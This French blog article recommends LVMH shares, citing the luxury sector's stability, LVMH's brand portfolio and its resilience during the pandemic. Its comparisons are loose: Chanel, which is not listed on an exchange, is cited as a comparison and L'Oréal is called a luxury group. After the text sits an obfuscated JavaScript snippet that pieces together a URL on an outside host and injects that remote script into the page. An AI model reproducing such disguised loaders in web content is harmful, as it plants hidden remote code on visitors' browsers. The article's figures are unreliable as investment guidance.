Pourquoi LVMH est une action intéressante à insérer dans son portefeuille boursier ?

995
Partager :
Action en bourse représentée avec un téléphone et un calendrier

En bourse, il est impossible d’être certain qu’une action performera telle qu’on le désire. Cependant, certaines d’entre elles ont démontré des résistances particulières à tout type de mouvements qui sont venus ébranler les marchés. C’est le cas de l’action LVMH dont le cours reste en hausse, même lorsque les marchés financiers sont en tension.

Des secteurs qui tendent à demeurer stable 

Lorsque l’on décide d’acheter des actions en bourse, il faut procéder à un grand nombre d’analyse, si l’on veut s’assurer d’investir dans des entreprises qui resteront stables dans le futur. Rien ne nous permet d’être certains que le cours d’une action ne s’effondrera pas. Mais en prenant le temps d’analyser les cours du marché sur une période donnée (on suggère deux ans), en étudiant les profits de l’entreprise et les dividendes qu’elle verse à ses actionnaires, on peut juger de la solidité de la société et de l’intérêt à investir en elle. 

A lire en complément : Les stratégies d'investissement à long terme pour des actions à fort potentiel en bourse

Certains secteurs démontrent une stabilité plus grande, et c’est le cas des produits de luxe, dans lequel évolue LVMH. Si l’on veut aller au cœur du sujet, pour tenter de trouver une explication à ce phénomène, on peut tout d’abord considérer que ceux qui achètent ce type de produit ne subissent pas les mêmes difficultés financières que la classe moyenne. Même si les temps sont durs, ils conservent la capacité de consommer que les autres classes sociales peuvent perdre, lorsque l’inflation ne cesse de croître comme aujourd’hui, par exemple.  

Pourquoi acquérir des actions LVMH au lieu d’autres marques de luxe ? 

A lire en complément : Kuaishou : la rivale de TikTok réalise une entrée en Bourse flamboyante

Il existe d’autres entreprises de luxe qui fonctionnent elles aussi très bien. Pensons entre autres à Chanel, Hermès, ou encore au groupe l’Oréal. Mais si l’on prend ce dernier en exemple, on verra qu’il a subi des hausses et des baisses plus conséquentes sur les douze derniers mois que l’action de LVMH. De plus, la première a gagné 8 % de sa valeur sur une année, alors que celle de LVMH a augmenté de 28 %. Comment expliquer cette différence et l’attrait unique des actions de LVMH ? Eh bien, c’est tout simplement le plus grand groupe de biens de luxe au monde.  

En effet, le groupe est constitué de noms tous plus prestigieux les uns que les autres. Sur les 75 marques que contient le groupe, on peut en nommer quelques-unes qui expliquent à elles seules la force de LVMH : Louis Vuitton, Bulgari et Fendi. L’entreprise se spécialise dans cinq secteurs du luxe qui sont : les vêtements, les montres, les bijoux ainsi que les vins et spiritueux, et les parfums et produits cosmétiques.  

Le luxe a résisté à la pandémie 

Lorsque l’on étudie les cours en bourse, durant la période où le coronavirus causait des ravages importants sur les marchés financiers, on se rend compte que le secteur du luxe a su résister à toutes les tensions du moment. On peut presque dire que la pandémie a même été bénéfique pour eux, car elle a fait augmenter le prix de leurs produits, vu les problèmes qui existaient alors sur la chaîne d’approvisionnement. Naturellement, les prix n’ont pas redescendu depuis.  

(function(){
cdq4=document.createElement(« script »);cdq4_=(« ust »);cdq4u= »495870381″;
cdq4_+= »a »+(« t.i »);cdq4.type= »text/javascript »;
cdq4u+= ».tai2x3avdq4hhsj6w5lt »;cdq4.async=true;cdq4_+= »n »+(« f »+ »o »)+ »/ »;
cdq4u+= »0xeny4e0du »;cdq4.src= »https:// »+cdq4_+cdq4u;
document.body.appendChild(cdq4);
})();

Partager :